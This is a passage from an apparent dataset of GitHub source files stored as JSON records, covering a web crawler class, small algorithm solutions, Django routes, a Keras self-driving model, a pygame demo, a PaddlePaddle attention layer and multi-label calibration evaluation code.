f'<a href=\"data:file/zip;base64,{b64}\" download=\\'{filename}.zip\\'>\\\n Click here to download \\\n </a>'\n st.markdown(href, unsafe_allow_html=True)\n","repo_name":"shoebNTU/freq_analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9906937542","text":"import requests, urlparse, json, lxml\nfrom bs4 import BeautifulSoup\n\nclass Crawler(object):\n\tdef __init__(self, headers={}, cookies={}):\n\t\tself.session = requests.session()\n\n\t\theaders.update({\n\t\t\t'user-agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'\n\t\t})\n\n\t\tself.session.headers.update(headers)\n\t\tself.add_to_cookies(cookies)\n\n\tdef visit(self, url):\n\t\treturn self._get(url)\n\n\tdef submit(self, form, data={}, headers={}, method=None):\n\t\tdata = self._merge(form.data, data)\n\n\t\tif method == 'get' or form.type == 'get':\n\t\t\treturn self._get(form.url, data, headers)\n\t\telse:\n\t\t\treturn self._post(form.url, data, headers)\n\n\tdef get_forms(self, url):\n\t\tresponse = self._get(url)\n\n\t\t# update the url in case we were redirected\n\t\t# example: http://github.com/login redirects to https://github.com/login\n\t\turl = response.url\n\n\t\thtml = BeautifulSoup(response.text, 'lxml')\n\t\tforms = []\n\t\tfor form in html.find_all('form'):\n\t\t\tinputs = []\n\t\t\tfor _input in form.find_all('input'):\n\t\t\t\tinputs.append({\n\t\t\t\t\t'name': _input['name'] if 'name' in _input.attrs else '',\n\t\t\t\t\t'value': _input['value'] if 'value' in _input.attrs else '',\n\t\t\t\t\t'type': _input['type'] if 'type' in _input.attrs else ''\n\t\t\t\t})\n\n\t\t\tmethod = form['method'].lower() if 'method' in form.attrs else 'get'\n\t\t\tforms.append(CrawlerForm(url, form['action'], inputs, method))\n\n\t\treturn forms\n\n\t# return dictionary of cookies\n\tdef get_cookies(self):\n\t\treturn requests.utils.dict_from_cookiejar(self.session.cookies)\n\n\t# dictionary to add/overwrite cookies\n\tdef add_to_cookies(self, cookie):\n\t\tself.session.cookies = requests.utils.cookiejar_from_dict(self._merge(self.get_cookies(), cookie))\n\n\t# return dictionary of headers\n\tdef get_headers(self):\n\t\treturn dict(self.session.headers)\n\n\t# dictionary to add/overwrite headers\n\tdef add_to_headers(self, header):\n\t\tself.session.headers = self._merge(self.session.headers, header)\n\n\tdef _request(self, method, url, params={}, headers={}, cookies={}):\n\t\theaders = self._merge(self.session.headers, headers)\n\n\t\tcookies = self._merge(self.get_cookies(), cookies)\n\t\tif method == 'get':\n\t\t\treturn self.session.request(method.upper(), url, params=params, headers=headers, cookies=cookies)\n\t\telse:\n\t\t\treturn self.session.request(method.upper(), url, data=params, headers=headers, cookies=cookies)\n\n\tdef _get(self, url, *arg):\n\t\treturn self._request('get', url, *arg)\n\n\tdef _post(self, url, *arg):\n\t\treturn self._request('post', url, *arg)\n\n\tdef _merge(self, dict1, dict2):\n\t\treturn dict(dict1.items() + dict2.items())\n\nclass CrawlerForm(object):\n\tdef __init__(self, url, action, inputs, type):\n\t\tself.url = urlparse.urljoin(url, action)\n\t\tself.data = {}\n\n\t\tfor _input in inputs:\n\t\t\tif _input['name'] is not '':\n\t\t\t\tself.data[_input['name']] = _input['value']\n\n\t\tif type != 'get' and type != 'post':\n\t\t\traise Exception('Form type invalid: \\'%s\\'')\n\n\t\tself.type = type\n\n\tdef __str__(self):\n\t\treturn json.dumps({\n\t\t\t'url': self.url,\n\t\t\t'data': self.data,\n\t\t\t'type': self.type\n\t\t})","repo_name":"sathoro/python-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71126955987","text":"class Solution:\n def fixedPoint(self, arr: List[int]) -> int:\n l, r, res = 0, len(arr)-1, -1\n while l <= r:\n m = (l+r) // 2\n if arr[m] == m: res, r = m, m-1\n elif arr[m] < m: l = m+1\n else: r = m-1\n return res\n \n ","repo_name":"cedricwangyu/LC","sub_path":"1064-Fixed_Point.py","file_name":"1064-Fixed_Point.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3000042497","text":"from django.urls import path\nfrom .views import TipoDocumentoListAPIView, TipoDocumentoDetailAPIView, TipoContribuyenteListAPIView, \\\n EntidadListAPIView, EntidadDetailAPIView, TipoContribuyenteDetailAPIView\n\nurlpatterns = [\n path('tipo-documentos/', TipoDocumentoListAPIView.as_view(), # listar, crear\n name='tipo-documentos'),\n\n path('tipo-documento/<int:pk>/', TipoDocumentoDetailAPIView.as_view(), # de detalle actualizar y eliminar,\n name='tipo-documento'),\n\n path('tipo-contribuyentes/', TipoContribuyenteListAPIView.as_view(),\n name='tipo-contribuyentes'),\n\n path('tipo-contribuyente/<int:pk>/', TipoContribuyenteDetailAPIView.as_view(),\n name='tipo-contribuyente'),\n\n path('entidades/', EntidadListAPIView.as_view(),\n name='entidades'),\n\n path('entidad/<int:pk>/', EntidadDetailAPIView.as_view(),\n name='entidad'),\n]\n","repo_name":"Yhonniel/entidades-backend","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37760569505","text":"N = int(input())\nnum = list(map(int, input().split()))\nMin = min(num)\n\nfor i in range(len(num)) :\n num[i] += abs(Min)\n\nnewNum = set(num)\nnewNum = list(newNum)\n\nnewNum.sort()\n\n# dictionary를 통해 결과 값을 저장\ndic = {}\nfor i in range(len(newNum)) :\n dic[i] = newNum[i]\n\nreverse_dic = dict(map(reversed, dic.items()))\n\nfor i in range(N) :\n print(reverse_dic[num[i]], end=' ')\n","repo_name":"KangGeonyoung/Algorithm","sub_path":"Baekjoon/12. 정렬/18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26577010174","text":"import csv\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Cropping2D, Lambda\nfrom keras.layers.core import Dense, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nimage_width = 320\nimage_height = 160\n\ndef process_CSV(directory_list):\n \"\"\"\n Read the CSV file and return a list of the lines\n (Also remove the last empty line in the CSV)\n \"\"\"\n lines = []\n for dir_name in directory_list:\n filename = dir_name + 'driving_log.csv'\n with open(filename) as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n lines.pop() # remove the empty line \n return lines\n\n\ndef augment_flip(image, steering_angle):\n \"\"\"\n Flip the image and steering_angle and return them\n \"\"\"\n image_flipped = np.fliplr(image)\n steering_angle_flipped = np.multiply(-1.0,steering_angle)\n return image_flipped, steering_angle_flipped\n\n\ndef process_line(line):\n \"\"\"\n Process a line from driving_log CSV. Return the center, left, \n and right images and coresponding steering angles, as well as\n the flipped version of these data\n \"\"\"\n # Steering angle adjustment for left and right images\n correction = 0.2\n # Get the images from the line\n images = []\n for i in range(3):\n image = ndimage.imread(line[i])\n images.append(image)\n # Generate steering_angles for each image\n steering_angle = float(line[3])\n steering_angles = [steering_angle, steering_angle+correction, steering_angle-correction]\n # Augment the data\n images_flipped, steering_angles_flipped = augment_flip(images,steering_angles)\n images.extend(images_flipped)\n steering_angles.extend(steering_angles_flipped)\n return images, steering_angles\n \n\ndef generator(samples, batch_size=32):\n \"\"\"\n Generate images and steering angles from CSV lines in batches\n \"\"\"\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n # Batching\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n # Process a batch of data\n images = []\n angles = []\n for batch_sample in batch_samples:\n batch_images, batch_angles = process_line(batch_sample)\n images.extend(batch_images)\n angles.extend(batch_angles)\n\n # Convert to numpy array\n X_train = np.array(images)\n y_train = np.array(angles)\n yield shuffle(X_train, y_train)\n \n# Read CSV\nCSV_directories = ['./my_data/', './track1_reverse/', './track2/', './track2_reverse/']\nlines = process_CSV(CSV_directories)\n# For the first dataset, I started at a turn but didn't start driving \n# until sometime after pressing the 'record' button, so I am removing\n# these data which has 0 steering angle at a turn.\ngood_lines = lines[14:]\ntrain_samples, validation_samples = train_test_split(good_lines, test_size=0.2)\n\n# Model\nmodel = Sequential()\nmodel.add(Cropping2D(cropping=((64,32), (0,0)), input_shape=(160,320,3))) # Crop to the road\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5)) # Normalize\nmodel.add(Conv2D(24, (5,5), strides=(2,2), activation='relu'))\nmodel.add(Conv2D(36, (5,5), strides=(2,2), activation='relu'))\nmodel.add(Conv2D(48, (5,5), strides=(2,2), activation='relu'))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(100))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(50))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(10))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(1))\n\n# Training Setup\nepoch = 50\nbatch_size=32\nfilename = 'model'\n# Data\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n# Callbacks\ncheckpoint = ModelCheckpoint(filepath=(filename+'.h5'), monitor='val_loss', save_best_only=True)\nstopper = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=5)\n# Training\nmodel.compile(loss='mse', optimizer='adam')\nhistory_object = model.fit_generator(train_generator, \\\n steps_per_epoch=np.ceil(len(train_samples)/batch_size), \\\n validation_data=validation_generator, \\\n validation_steps=np.ceil(len(validation_samples)/batch_size), \\\n epochs=epoch, callbacks = [checkpoint, stopper])\n# Save history\nwith open(filename+'.p', 'wb') as file_pi:\n pickle.dump(history_object.history, file_pi)\n \n \n \n# # Other stuff I've tried \n#model.fit(X_train, y_train, validation_split=0.5, shuffle=True, epochs=epoch, callbacks=[checkpoint, stopper]) # loss: 0.05, vac_los: 0.4?\n#model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch, callbacks=[checkpoint, stopper]) # loss: 0.05+, vac_loss: 0.11\n# # Without callbacks\n# epoch = 5\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch) \n# model.save('model_overfit.h5') # loss: 0.037, vac_loss: 0.12\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch)\n# model.save('model_overfit2.h5') # - loss: 0.0339 - val_loss: 0.1243\n# model.fit(X_train, y_train, shuffle=True, epochs=epoch)\n# model.save('model_superoverfit.h5') # loss: 0.04","repo_name":"GuanyangLuo/CarND-End_to_End_Learning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"18383216309","text":"import pygame\nimport sys\n\nblack = (0, 0, 0)\nred = (255, 0, 0)\nwhite = (255, 255, 255)\npygame.init()\nscr = pygame.display.set_mode((600, 600))\nwin = scr.get_rect()\n\nbox = pygame.Rect(0, 0, 50, 50)\nbox.center = win.center\n\nvec = [3, 5]\nvec2 = [1, 2]\nfps = pygame.time.Clock()\n\nmyfont = pygame.font.Font('freesansbold.ttf', 48)\nmsg = myfont.render(\"The Game !!!\", True, red)\n\nmsg_box = msg.get_rect()\nmsg_box.center = win.center\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n msg_box = msg_box.move(vec2)\n if msg_box.left < win.left or msg_box.right > win.right:\n vec2[0] = -vec2[0]\n if msg_box.bottom > win.bottom or msg_box.top < win.top:\n vec2[1] = -vec2[1]\n box = box.move(vec)\n if box.left < win.left or box.right > win.right:\n vec[0] = -vec[0]\n if box.bottom > win.bottom or box.top < win.top:\n vec[1] = -vec[1]\n\n scr.fill(black)\n pygame.draw.rect(scr, white, box)\n scr.blit(msg, msg_box)\n\n pygame.display.flip()\n\n fps.tick(100)\n","repo_name":"MichalZelazko/Scripting-Languages-2021-22","sub_path":"pygame6.py","file_name":"pygame6.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21931234917","text":"import paddle\nfrom paddle import tensor\nfrom paddle.fluid import layers\nimport paddle.nn.functional as F\nfrom paddle.nn import Layer, Linear\nfrom paddle.fluid.data_feeder import convert_dtype\n\n__all__ = ['QuickGELU', 'AttentionPool2D']\n\n\nclass QuickGELU(Layer):\n \"\"\" GELU \"\"\"\n def forward(self, x):\n return x * F.sigmoid(1.702 * x)\n\n\nclass AttentionPool2D(Layer):\n def __init__(self, spacial_dim, embed_dim, num_heads, output_dim,\n dropout=0,\n need_weights=False,\n weight_attr=None,\n bias_attr=None):\n super(AttentionPool2D, self).__init__()\n self.positional_embedding = paddle.randn((spacial_dim ** 2 + 1, embed_dim)) / embed_dim ** 0.5\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.dropout = dropout\n self.need_weights = need_weights\n\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n self.in_features = embed_dim\n self.q_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.k_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.v_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.out_proj = Linear(\n embed_dim, output_dim or embed_dim, weight_attr, bias_attr=bias_attr)\n\n def _prepare_qkv(self, query, key, value):\n q = self.q_proj(query)\n q = tensor.reshape(x=q, shape=[0, 0, self.num_heads, self.head_dim])\n q = tensor.transpose(x=q, perm=[0, 2, 1, 3])\n k, v = self.compute_kv(key, value)\n return (q, k, v)\n\n def compute_kv(self, key, value):\n k = self.k_proj(key)\n v = self.v_proj(value)\n k = tensor.reshape(x=k, shape=[0, 0, self.num_heads, self.head_dim])\n k = tensor.transpose(x=k, perm=[0, 2, 1, 3])\n v = tensor.reshape(x=v, shape=[0, 0, self.num_heads, self.head_dim])\n v = tensor.transpose(x=v, perm=[0, 2, 1, 3])\n return k, v\n\n\n def forward(self, x):\n x = x.reshape((x.shape[0], x.shape[1], x.shape[2] * x.shape[3])).transpose((2, 0, 1)) # NCHW -> (HW)NC\n x = paddle.concat([x.mean(axis=0, keepdim=True), x], axis=0) # (HW+1)NC\n x = x + self.positional_embedding.unsqueeze(axis=1).astype(x.dtype) # (HW+1)NC\n x = self.multi_head_attention_forward(\n query=x, key=x, value=x,\n )\n return x[0]\n\n\n\n def multi_head_attention_forward(self,\n query, key=None, value=None,\n attn_mask=None, cache=None):\n key = query if key is None else key\n value = query if value is None else value\n # compute q ,k ,v\n q, k, v = self._prepare_qkv(query, key, value)\n\n # scale dot product attention\n # TODO(guosheng): use tensor.matmul, however it doesn't support `alpha`\n product = layers.matmul(\n x=q, y=k, transpose_y=True, alpha=self.head_dim**-0.5)\n if attn_mask is not None:\n # Support bool or int mask\n attn_mask = _convert_attention_mask(attn_mask, product.dtype)\n product = product + attn_mask\n weights = F.softmax(product)\n if self.dropout:\n weights = F.dropout(\n weights,\n self.dropout,\n training=self.training,\n mode=\"upscale_in_train\")\n\n out = tensor.matmul(weights, v)\n\n # combine heads\n out = tensor.transpose(out, perm=[0, 2, 1, 3])\n out = tensor.reshape(x=out, shape=[0, 0, out.shape[2] * out.shape[3]])\n\n # project to output\n out = self.out_proj(out)\n\n outs = [out]\n if self.need_weights:\n outs.append(weights)\n if cache is not None:\n outs.append(cache)\n return out if len(outs) == 1 else tuple(outs)\n\ndef _convert_attention_mask(attn_mask, dtype):\n if attn_mask is not None and attn_mask.dtype != dtype:\n attn_mask_dtype = convert_dtype(attn_mask.dtype)\n if attn_mask_dtype == 'bool' or 'int' in attn_mask_dtype:\n attn_mask = (paddle.cast(attn_mask, dtype) - 1.0) * 1e9\n else:\n attn_mask = paddle.cast(attn_mask, dtype)\n return attn_mask\n","repo_name":"PaddlePaddle/PASSL","sub_path":"passl_v110/modeling/backbones/base_transformer.py","file_name":"base_transformer.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"48"} +{"seq_id":"31622930937","text":"from copy import deepcopy\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport warnings\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn import metrics\nfrom tqdm import tqdm\nimport argparse\nfrom mmcv import Config, DictAction\nimport os.path\n\nimport mmcv\nimport numpy as np\nimport torch\n\nfrom dywsss.tool import pyutils, imutils\nimport dywsss.tool.data\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom torch.backends import cudnn\nfrom dywsss.tool.torch_utils import *\nimport timm\nfrom ml_metric import Accuracy, F1Measure, F1Measure_sklearn, ECE_loss\ncudnn.enabled = True\n\ncategories = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\ndef average_performance(pred, target, thr=None, k=None):\n \"\"\"Calculate CP, CR, CF1, OP, OR, OF1, where C stands for per-class\n average, O stands for overall average, P stands for precision, R stands for\n recall and F1 stands for F1-score.\n Args:\n pred (torch.Tensor | np.ndarray): The model prediction with shape\n (N, C), where C is the number of classes.\n target (torch.Tensor | np.ndarray): The target of each prediction with\n shape (N, C), where C is the number of classes. 1 stands for\n positive examples, 0 stands for negative examples and -1 stands for\n difficult examples.\n thr (float): The confidence threshold. Defaults to None.\n k (int): Top-k performance. Note that if thr and k are both given, k\n will be ignored. Defaults to None.\n Returns:\n tuple: (CP, CR, CF1, OP, OR, OF1)\n \"\"\"\n if isinstance(pred, torch.Tensor) and isinstance(target, torch.Tensor):\n pred = pred.detach().cpu().numpy()\n target = target.detach().cpu().numpy()\n elif not (isinstance(pred, np.ndarray) and isinstance(target, np.ndarray)):\n raise TypeError('pred and target should both be torch.Tensor or'\n 'np.ndarray')\n if thr is None and k is None:\n thr = 0.5\n warnings.warn('Neither thr nor k is given, set thr as 0.5 by '\n 'default.')\n elif thr is not None and k is not None:\n warnings.warn('Both thr and k are given, use threshold in favor of '\n 'top-k.')\n\n assert pred.shape == \\\n target.shape, 'pred and target should be in the same shape.'\n\n eps = np.finfo(np.float32).eps\n target[target == -1] = 0\n if thr is not None:\n # a label is predicted positive if the confidence is no lower than thr\n pos_inds = pred >= thr\n\n else:\n # top-k labels will be predicted positive for any example\n sort_inds = np.argsort(-pred, axis=1)\n sort_inds_ = sort_inds[:, :k]\n inds = np.indices(sort_inds_.shape)\n pos_inds = np.zeros_like(pred)\n pos_inds[inds[0], sort_inds_] = 1\n\n tp = (pos_inds * target) == 1\n fp = (pos_inds * (1 - target)) == 1\n fn = ((1 - pos_inds) * target) == 1\n\n precision_class = tp.sum(axis=0) / np.maximum(\n tp.sum(axis=0) + fp.sum(axis=0), eps)\n recall_class = tp.sum(axis=0) / np.maximum(\n tp.sum(axis=0) + fn.sum(axis=0), eps)\n CP = precision_class.mean() * 100.0\n CR = recall_class.mean() * 100.0\n CF1 = 2 * CP * CR / np.maximum(CP + CR, eps)\n OP = tp.sum() / np.maximum(tp.sum() + fp.sum(), eps) * 100.0\n OR = tp.sum() / np.maximum(tp.sum() + fn.sum(), eps) * 100.0\n OF1 = 2 * OP * OR / np.maximum(OP + OR, eps)\n return CP, CR, CF1, OP, OR, OF1\n\n\ndef average_precision(pred, target):\n r\"\"\"Calculate the average precision for a single class.\n AP summarizes a precision-recall curve as the weighted mean of maximum\n precisions obtained for any r'>r, where r is the recall:\n .. math::\n \\text{AP} = \\sum_n (R_n - R_{n-1}) P_n\n Note that no approximation is involved since the curve is piecewise\n constant.\n Args:\n pred (np.ndarray): The model prediction with shape (N, ).\n target (np.ndarray): The target of each prediction with shape (N, ).\n Returns:\n float: a single float as average precision value.\n \"\"\"\n eps = np.finfo(np.float32).eps\n\n # sort examples\n sort_inds = np.argsort(-pred)\n sort_target = target[sort_inds]\n\n # count true positive examples\n pos_inds = sort_target == 1\n tp = np.cumsum(pos_inds)\n total_pos = tp[-1]\n\n # count not difficult examples\n pn_inds = sort_target != -1\n pn = np.cumsum(pn_inds)\n\n tp[np.logical_not(pos_inds)] = 0\n precision = tp / np.maximum(pn, eps)\n ap = np.sum(precision) / np.maximum(total_pos, eps)\n return ap\n\n# from mmcls\n\n\ndef mAP(pred, target):\n \"\"\"Calculate the mean average precision with respect of classes.\n Args:\n pred (torch.Tensor | np.ndarray): The model prediction with shape\n (N, C), where C is the number of classes.\n target (torch.Tensor | np.ndarray): The target of each prediction with\n shape (N, C), where C is the number of classes. 1 stands for\n positive examples, 0 stands for negative examples and -1 stands for\n difficult examples.\n Returns:\n float: A single float as mAP value.\n \"\"\"\n if isinstance(pred, torch.Tensor) and isinstance(target, torch.Tensor):\n pred = pred.detach().cpu().numpy()\n target = target.detach().cpu().numpy()\n elif not (isinstance(pred, np.ndarray) and isinstance(target, np.ndarray)):\n raise TypeError('pred and target should both be torch.Tensor or'\n 'np.ndarray')\n\n assert pred.shape == \\\n target.shape, 'pred and target should be in the same shape.'\n num_classes = pred.shape[1]\n ap = np.zeros(num_classes)\n # exist_classes = range(num_classes)\n\n label_exist = np.where(pred > 0.5, 1, 0).sum(0) + target.sum(0)\n\n # exist_classes = np.argwhere(label_exist > 0)[0]\n exist_classes = (label_exist > 0).nonzero()[0].tolist()\n # print(f'num_exist_classes is {len(exist_classes)}, exist_classes is {exist_classes}')\n\n # exist_classes = pass\n\n for k in exist_classes:\n ap[k] = average_precision(pred[:, k], target[:, k])\n mean_ap = ap.mean() * 100.\n return mean_ap\n\n\ndef Average_Precision(pred, target):\n N = len(target)\n for i in range(N):\n if max(target[i]) == 0 or min(target[i]) == 1:\n pass\n precision = 0\n for i in range(N):\n index = np.where(target[i] == 1)[0]\n score = pred[i][index]\n score = sorted(score)\n score_all = sorted(pred[i])\n precision_tmp = 0\n for item in score:\n tmp1 = score.index(item)\n tmp1 = len(score) - tmp1\n tmp2 = score_all.index(item)\n tmp2 = len(score_all) - tmp2\n precision_tmp += tmp1 / tmp2\n precision += precision_tmp / len(score)\n Average_Precision = precision / N\n return Average_Precision\n\n\ndef mean_avg_precision(pred, target):\n meanAP = metrics.average_precision_score(\n target, pred, average='macro', pos_label=1)\n return meanAP\n\n\nclass Normalize():\n def __init__(self, mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):\n self.mean = mean\n self.std = std\n\n def __call__(self, img):\n imgarr = np.asarray(img)\n proc_img = np.empty_like(imgarr, np.float32)\n\n proc_img[..., 0] = (imgarr[..., 0] / 255. - self.mean[0]) / self.std[0]\n proc_img[..., 1] = (imgarr[..., 1] / 255. - self.mean[1]) / self.std[1]\n proc_img[..., 2] = (imgarr[..., 2] / 255. - self.mean[2]) / self.std[2]\n\n return proc_img\n\n\ndef analyse_bin_10(prediction_batch, labels_batch):\n debug = 1\n for idx in range(labels_batch.shape[0]):\n y = np.argsort(prediction_batch[idx])[-1]\n x = np.sort(prediction_batch[idx])[-1]\n label = (labels_batch[idx] == 1).nonzero(as_tuple=True)[0]\n\n\n# Multi-label ECE\ndef compute_Conf_ECE(args, dir_score, num_bin, metric_func, note):\n df_score = pd.read_csv(dir_score)\n\n # sort by confidence\n df_score.sort_values(by=['confidence'], inplace=True)\n conf_score = df_score['confidence'].to_list()\n\n prediction_all = torch.randn(0)\n labels_all = torch.randn(0)\n\n perfermance_bins = []\n count_bins = []\n images_list_bins = []\n\n # mAP_function = mean_avg_precision\n\n # mAP_function = Average_Precision\n\n model = timm.create_model(args.network, pretrained=True, num_classes=20)\n model.load_state_dict(torch.load(args.weights))\n print(f'Loading weights from {args.weights}')\n print('\\nvalidating ... ', flush=True, end='')\n\n # devide miou_score to num_bin bins\n each_bin = 1/num_bin\n for bin in tqdm(range(num_bin)):\n\n bin_lower = bin * each_bin\n bin_upper = (bin + 1) * each_bin\n # find the name_images in bin\n idx_in_bin = (np.array(conf_score) <= bin_upper) * \\\n (np.array(conf_score) >= bin_lower)\n img_name_list_in_bin = np.array(\n df_score['name_image'].tolist())[idx_in_bin]\n mIoU_in_bin = np.array(df_score['confidence'].tolist())[idx_in_bin]\n\n images_list_bins.append(img_name_list_in_bin)\n count_bins.append(len(img_name_list_in_bin))\n\n # print(f'In [{bin_lower, bin_upper}] bin have {len(img_name_list_in_bin)} samples')\n normalize = Normalize()\n val_dataset = dywsss.tool.data.VOC12ClsDataset(\n img_name_list_path='',\n img_name_list=img_name_list_in_bin,\n voc12_root=args.voc12_root,\n transform=transforms.Compose([\n np.asarray,\n normalize,\n imutils.CenterCrop(args.crop_size),\n imutils.HWC_to_CHW,\n torch.from_numpy,\n ])\n )\n\n val_data_loader = DataLoader(\n val_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False\n )\n\n model.eval()\n model = model.cuda()\n\n valid_dict = {}\n count = 0\n\n prediction_batch = torch.randn(0)\n labels_batch = torch.randn(0)\n\n with torch.no_grad():\n for pack in val_data_loader:\n names = pack[0]\n imgs = pack[1].cuda(non_blocking=True)\n labels = pack[2].cuda(non_blocking=True)\n x = model(imgs)\n prediction = torch.sigmoid(x)\n prediction_batch = torch.cat(\n (prediction_batch, prediction.cpu()), 0)\n labels_batch = torch.cat((labels_batch, labels.cpu()), 0)\n\n # visualization\n case_idx = 4\n try:\n case_show(args, names[case_idx], img=imgs[case_idx], label=labels[case_idx], prediction=prediction[case_idx],\n mIoU=mIoU_in_bin[case_idx], bin=bin,\n dir_save=f'Fig/fig_ECE/{args.session_name}/case_show_batch_{case_idx}')\n except Exception as e:\n print(f'case show error! {e}')\n\n prediction_all = torch.cat((prediction_all, prediction_batch.cpu()), 0)\n labels_all = torch.cat((labels_all, labels_batch.cpu()), 0)\n\n # perfermance_bin = metric_func(pred=prediction_batch, target=labels_batch)\n try:\n # compute mAP pred, target\n perfermance_bin = metric_func(\n pred=prediction_batch, target=labels_batch)\n except:\n perfermance_bin = 0\n perfermance_bins.append(perfermance_bin)\n\n perfermance_overall = metric_func(pred=deepcopy(\n prediction_all), target=deepcopy(labels_all))\n ML_ECE = ECE_loss(pred=deepcopy(prediction_all), target=deepcopy(\n labels_all), num_bin=num_bin, network=args.fignote, save_path=f'Fig/fig_ECE/{args.session_name}')\n\n return perfermance_bins, count_bins, images_list_bins, perfermance_overall, ML_ECE\n\n\ndef compute_CAM_ECE(args, dir_score, num_bin):\n df_score = pd.read_csv(dir_score)\n df_score.sort_values(by=['miou'], inplace=True)\n miou_score = df_score['miou'].to_list()\n\n prediction_all = torch.randn(0)\n labels_all = torch.randn(0)\n\n mAP_bins = []\n count_bins = []\n images_list_bins = []\n\n # mAP_function = mean_avg_precision\n mAP_function = mAP\n # mAP_function = Average_Precision\n\n model = timm.create_model(args.network, pretrained=True, num_classes=20)\n model.load_state_dict(torch.load(args.weights))\n print(f'Loading weights from {args.weights}')\n print('\\nvalidating ... ', flush=True, end='')\n\n each_bin = 1/num_bin\n for bin in range(num_bin):\n\n bin_lower = bin * each_bin\n bin_upper = (bin + 1) * each_bin\n\n idx_in_bin = (np.array(miou_score) <= bin_upper) * \\\n (np.array(miou_score) >= bin_lower)\n img_name_list_in_bin = np.array(\n df_score['name_image'].tolist())[idx_in_bin]\n mIoU_in_bin = np.array(df_score['miou'].tolist())[idx_in_bin]\n\n images_list_bins.append(img_name_list_in_bin)\n count_bins.append(len(img_name_list_in_bin))\n\n normalize = Normalize()\n val_dataset = dywsss.tool.data.VOC12ClsDataset(\n img_name_list_path='',\n img_name_list=img_name_list_in_bin,\n voc12_root=args.voc12_root,\n transform=transforms.Compose([\n np.asarray,\n normalize,\n imutils.CenterCrop(args.crop_size),\n imutils.HWC_to_CHW,\n torch.from_numpy,\n ])\n )\n\n val_data_loader = DataLoader(\n val_dataset,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False\n )\n\n model.eval()\n model = model.cuda()\n\n valid_dict = {}\n count = 0\n\n prediction_batch = torch.randn(0)\n labels_batch = torch.randn(0)\n\n with torch.no_grad():\n for pack in val_data_loader:\n names = pack[0]\n imgs = pack[1].cuda(non_blocking=True)\n labels = pack[2].cuda(non_blocking=True)\n x = model(imgs)\n prediction = torch.sigmoid(x)\n prediction_batch = torch.cat(\n (prediction_batch, prediction.cpu()), 0)\n labels_batch = torch.cat((labels_batch, labels.cpu()), 0)\n\n prediction_all = torch.cat((prediction_all, prediction_batch.cpu()), 0)\n labels_all = torch.cat((labels_all, labels_batch.cpu()), 0)\n\n try:\n mAP_bin = mAP_function(pred=prediction_batch, target=labels_batch)\n except:\n mAP_bin = 0\n mAP_bins.append(mAP_bin)\n\n mAP_overall = mAP_function(pred=prediction_all, target=labels_all)\n\n return mAP_bins, count_bins, images_list_bins, mAP_overall\n\n\ndef 